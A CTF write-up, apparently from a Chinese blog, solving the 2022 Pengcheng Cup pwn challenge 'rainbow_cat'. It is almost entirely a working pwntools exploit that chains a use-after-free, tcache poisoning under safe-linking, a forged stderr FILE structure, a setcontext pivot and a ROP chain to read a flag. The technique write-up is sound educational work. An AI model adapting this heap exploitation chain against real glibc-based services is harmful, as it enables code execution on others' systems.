
2022 鹏程杯 pwn rainbow_cat

2022-07-03 17:04:57  阅读:254  来源: 互联网

标签:rainbow 鹏程 p64 edit 0x10 add base heap pwn


2022 鹏程杯 pwn rainbow_cat

我也不知道我是怎么搞出来的，学技术还得看 winmt 大师的博客：https://www.cnblogs.com/winmt/articles/16440009.html 。注意：下面脚本里的 libc 偏移（0x1e0c00、_IO_str_jumps、_IO_stdfile_2_lock 以及各个 gadget 地址）都是针对题目附带的 libc-2.33.so 硬编码的，换一个 libc 构建就需要重新计算。

from pwn import*
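# Verbose pwntools logging: every byte sent and received is printed, which is
# what you want while debugging the heap layout and pure noise otherwise.
context(os='linux', arch='amd64', log_level='debug')

# Target selection.  The write-up drove a remote listener; run the script as
# `python3 exp.py LOCAL` (pwntools `args`) to drive the local binary instead of
# editing the file.  Default behaviour is unchanged (remote).
if args.LOCAL:
    s = process('./rainbowcat')
else:
    s = remote('192.168.1.102', 9999)

# All offsets below are tied to this exact libc build (see the hard-coded
# constants after the libc leak); a different libc-2.33 build will not match.
libc = ELF('./libc-2.33.so')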

def add(index):
    """Menu option 1: allocate ("get") cat slot *index*.

    Only the slot number is sent; no size is chosen by the caller.
    """
    slot = str(index).encode()
    s.sendlineafter(b'Your choice >> ', b'1')
    s.sendlineafter(b'Which cat do you want to get? ', slot)

def delete(index):
    """Menu option 2: free ("abandon") cat slot *index*.

    The exploit below frees the same slot over and over, so the binary
    evidently neither clears nor validates the slot on free.
    """
    slot = str(index).encode()
    s.sendlineafter(b'Your choice >> ', b'2')
    s.sendlineafter(b'Which one do you want to abandon? ', slot)

def show(index):
    """Menu option 3: print the name stored in cat slot *index*.

    Used for the two leaks (heap and libc); the caller parses the output.
    """
    slot = str(index).encode()
    s.sendlineafter(b'Your choice >> ', b'3')
    s.sendlineafter(b'Choose a cat to show name: ', slot)

def edit(index, content):
    """Menu option 4: rename cat slot *index* with the raw bytes *content*.

    The payload goes through sendafter(), not sendlineafter(): no newline is
    appended, so send exactly the bytes you want the binary to read.  The
    script calls this on slots it has just freed, i.e. this is the
    use-after-free write primitive everything else is built on.
    """
    slot = str(index).encode()
    s.sendlineafter(b'Your choice >> ', b'4')
    s.sendlineafter(b'Which one?', slot)
    s.sendafter(b'Rename the cat: ', content)

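# Slot-to-address map noted by the author (relative to the leaked heap base):
#   slot 0 -> heap_base + 0x90
#   slot 1 -> heap_base + 0x10
# NOTE(review): on glibc 2.33 those offsets are tcache_perthread_struct's
# entries[] (+0x90) and counts[] (+0x10), which would explain why
# "edit(1, count); edit(0, head); add(2)" acts as an arbitrary allocation
# below.  Inferred from the offsets and their use -- confirm in gdb.


def tcache_write(addr, data):
    """Write *data* at *addr* through the tcache bin the two slots alias.

    Sets the bin count to 1 (slot 1) and its head to *addr* (slot 0), so the
    next add() hands back *addr*; the rename of slot 2 then lands there.
    *data* is sent raw (see edit()), so keep it within the binary's read size.
    """
    edit(1, p64(1))
    edit(0, p64(addr))
    add(2)
    edit(2, data)


# ---- Stage 1: heap leak -----------------------------------------------------
for _ in range(7):
    add(0)

add(1)
add(2)

# Free slot 0 eight times.  The 0x10-byte rename after each free clobbers the
# freed chunk's first two words (next / tcache key) so the allocator's
# double-free check does not fire.  The `<< 12` below implies the eighth free
# leaves a safe-linked fd of (address >> 12) at the front, which show() prints.
# (Mechanism inferred; verify against the glibc build in use.)
for _ in range(7):
    delete(0)
    edit(0, b'a' * 0x10)

delete(0)
show(0)

s.recvuntil(b'Name:')
heap_base = u64(s.recv(6).ljust(8, b'\x00')) << 12
if heap_base == 0:
    # Every later address is derived from this; fail loudly instead of
    # poisoning pointers with 0.
    raise RuntimeError('heap leak failed: read 0 where the freed chunk fd should be')
success('heap_base=>' + hex(heap_base))


def protect(ptr):
    """Safe-linking encode (glibc >= 2.32): next pointers are stored as ptr ^ (&field >> 12).

    Every fd written below sits in the first 0x1000 bytes of the heap
    (offsets <= 0x360), so heap_base >> 12 is the right key for all of them.
    """
    return ptr ^ (heap_base >> 12)


# Point the freed chunk's fd at heap_base + 0x10 (slot 1's location per the
# author's map) so the next allocations hand out that region.
edit(0, p64(protect(heap_base + 0x10)))

add(0)
add(1)

# ---- Stage 2: libc leak -----------------------------------------------------
# Same free-eight-times dance on slot 1, rewriting the freed chunk's first
# two words (8, filler) each round.
for _ in range(7):
    delete(1)
    edit(1, p64(8) + b'a' * 8)

delete(1)

show(1)
s.recvuntil(b'Name:')
# 0x1e0c00 is the distance from the leaked pointer (presumably a main_arena
# pointer left in the chunk) to the base of the bundled libc-2.33.so.  It is
# specific to that build.
libc_base = u64(s.recv(6).ljust(8, b'\x00')) - 0x1e0c00
if libc_base & 0xfff:
    # A real mapping base is page aligned; anything else means the leak or
    # the 0x1e0c00 offset is wrong for this libc.
    raise RuntimeError('libc leak failed: base %#x is not page aligned' % libc_base)
success('libc_base=>' + hex(libc_base))

# Exported symbols come from the ELF; the rest are raw offsets into this exact
# libc-2.33.so (vtable, stderr's lock, ROP gadgets) and must be re-derived for
# any other build.
__free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
_IO_2_1_stderr_ = libc_base + libc.sym['_IO_2_1_stderr_']
_IO_str_jumps = libc_base + 0x1e2560
# setcontext+61: the register-load part of setcontext, which on this glibc
# reads the new rsp from [rdx+0xa0] and the return address from [rdx+0xa8]
# (matches the p64(rop) + p64(ret) written at +0xa0 below -- confirm).
setcontext_61 = libc_base + libc.sym['setcontext'] + 61
_IO_stdfile_2_lock = libc_base + 0x1e3660

pop_rdi_ret = libc_base + 0x0000000000028a55
pop_rsi_ret = libc_base + 0x000000000002a4cf
pop_rdx_ret = libc_base + 0x00000000000c7f32
pop_rax_ret = libc_base + 0x0000000000044c70
syscall_ret = libc_base + 0x000000000006105a
ret = libc_base + 0x0000000000026699
# Pivot gadget chosen by the author.  The forged data below is consistent with
# it loading rdx from [rdi+8] and calling [rdx+0x20] (the classic glibc
# "mov rdx, [rdi+8]; ...; call [rdx+0x20]" gadget) -- verify with a disassembler.
magic = libc_base + 0x000000000014a0a0

fake_IO_stderr_addr = heap_base + 0x10   # the forged FILE lives in slot 1's region
rop = heap_base + 0x500                  # ROP chain + flag path/buffer scratch area

# ---- Stage 3: chain fake fastbin chunks into _IO_2_1_stderr_ -----------------
edit(1, p64(0) * 2)

# Free slot 0 twice (clobbering next/key in between) and point its fd at
# heap_base + 0x90 -- slot 0's own location per the author's map.
delete(0)
edit(0, b'a' * 0x10)
delete(0)

edit(0, p64(protect(heap_base + 0x90)))
add(0)
add(0)

# First controlled allocation: slot 2 = heap_base + 0x2a0.
edit(1, p64(1))
edit(0, p64(heap_base + 0x2a0))
add(2)

# Link the 0x20-spaced chunks at heap_base+0x290 .. +0x350 into one list whose
# tail fd is _IO_2_1_stderr_ + 0x50.  Each round: mark the bin full (count 7)
# so delete() sends the chunk to the fastbin, forge its fd (safe-linked) and a
# key word that mimics the tcache pointer, then re-point the tcache head at the
# next chunk and allocate it.  Author's note: once this list is drained into
# the tcache, _IO_2_1_stderr_._chain ends up as heap_base + 0x10 (the fake
# FILE); that is consistent with tcache_put() storing the tcache pointer in the
# key word, which for a chunk at stderr+0x50 is the _chain field (+0x68).
fake_fds = [
    _IO_2_1_stderr_ + 0x60 - 0x10,
    heap_base + 0x290,
    heap_base + 0x2b0,
    heap_base + 0x2d0,
    heap_base + 0x2f0,
    heap_base + 0x310,
    heap_base + 0x330,
]
next_chunks = [heap_base + 0x2c0 + 0x20 * k for k in range(6)]   # 0x2c0 .. 0x360
for fd, nxt in zip(fake_fds, next_chunks):
    edit(1, p64(7))
    delete(2)
    edit(2, p64(protect(fd)) + p64(heap_base + 0x10))
    edit(0, p64(nxt))
    add(2)

# Last link: forge the fd only, no further allocation.
edit(1, p64(7))
delete(2)
edit(2, p64(protect(fake_fds[-1])) + p64(heap_base + 0x10))

# Empty the tcache bin (count 0, head 0) and allocate: malloc now serves from
# the fastbin and stashes the rest of the list into the tcache -- the step that
# writes into stderr (see the note above).
edit(1, p64(0))
edit(0, p64(0))

add(2)

# ---- Stage 4: forge the FILE at fake_IO_stderr_addr --------------------------
# NOTE(review): field names below follow glibc 2.33's struct _IO_FILE layout
# (_IO_write_base +0x20, _IO_write_ptr +0x28, _IO_buf_base +0x38,
# _IO_buf_end +0x40, _lock +0x88, vtable +0xd8); confirm against the bundled
# libc.  Writes whose purpose the author did not state are marked as such.

#####  prepare for malloc / free / memcpy (author's comment)
tcache_write(heap_base + 0x20, p64(0) + p16(0) + p16(1))            # author's layout; purpose not stated
tcache_write(heap_base + 0x90 + 0x60, p64(0) + p64(__free_hook))    # author's layout; purpose not stated

tcache_write(fake_IO_stderr_addr + 0x20, p64(0) + p64(0xffffffffffffffff))   # _IO_write_base = 0, _IO_write_ptr = -1
tcache_write(fake_IO_stderr_addr + 0xd0, p64(0) + p64(_IO_str_jumps))        # vtable (+0xd8) = _IO_str_jumps
tcache_write(fake_IO_stderr_addr + 0x80, p64(0) + p64(_IO_stdfile_2_lock))   # _lock (+0x88) = stderr's real lock
tcache_write(fake_IO_stderr_addr + 0x30, p64(0) + p64(fake_IO_stderr_addr + 0x100))  # _IO_buf_base (+0x38)
tcache_write(fake_IO_stderr_addr + 0x40, p64(fake_IO_stderr_addr + 0x140) + p64(0))  # _IO_buf_end (+0x40)
# The string buffer region: [buf+0] = magic (the call target), [buf+8] = the
# fake context whose +0x20 slot holds setcontext+61 (see the gadget note).
tcache_write(fake_IO_stderr_addr + 0x100, p64(magic) + p64(fake_IO_stderr_addr + 0x1f0))
# 0x21 size words around the buffer -- presumably fake chunk headers so the
# allocator accepts the region as a 0x20 chunk (author did not state this).
tcache_write(fake_IO_stderr_addr + 0xf0, p64(0) + p64(0x21))
tcache_write(fake_IO_stderr_addr + 0x110, p64(0) + p64(0x21))
tcache_write(fake_IO_stderr_addr + 0x210, p64(setcontext_61))                 # context + 0x20
tcache_write(fake_IO_stderr_addr + 0x1f0 + 0xa0, p64(rop) + p64(ret))        # context + 0xa0: rsp, then ret address

# ---- Stage 5: ROP chain -- open("./flag", O_RDONLY); read(3, buf, 0x50); write(1, buf, 0x50)
# x86-64 syscall numbers: open = 2, read = 0, write = 1.  The path is relative
# to the service's cwd, the fd is assumed to be 3 (first free descriptor), and
# only 0x50 bytes are copied, so a longer flag is truncated.
tcache_write(rop + 0x100, b'./flag\x00')

chain = [
    (pop_rdi_ret, rop + 0x100),
    (pop_rsi_ret, 0),
    (pop_rdx_ret, 0),
    (pop_rax_ret, 2),
    (syscall_ret, ret),
    (pop_rdi_ret, 3),
    (pop_rsi_ret, rop + 0x200),
    (pop_rdx_ret, 0x50),
    (pop_rax_ret, 0),
    (syscall_ret, ret),
    (pop_rdi_ret, 1),
    (pop_rsi_ret, rop + 0x200),
    (pop_rdx_ret, 0x50),
    (pop_rax_ret, 1),
    (syscall_ret, ret),
]
for k, (gadget, value) in enumerate(chain):
    tcache_write(rop + 0x10 * k, p64(gadget) + p64(value))

# ---- Stage 6: trigger ----------------------------------------------------------
# Hand out _IO_2_1_stderr_ itself as the next "cat".  Whatever error path the
# binary/allocator takes from there (not visible in this script) walks stderr's
# _chain into the forged FILE, whose _IO_str_jumps vtable leads to magic ->
# setcontext -> the ROP chain above.
edit(1, p64(1))
edit(0, p64(_IO_2_1_stderr_))

# Uncomment to break right before the trigger allocation:
# gdb.attach(s)
# pause()

add(2)
s.interactive()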

来源: https://www.cnblogs.com/pwnfeifei/p/16440100.html
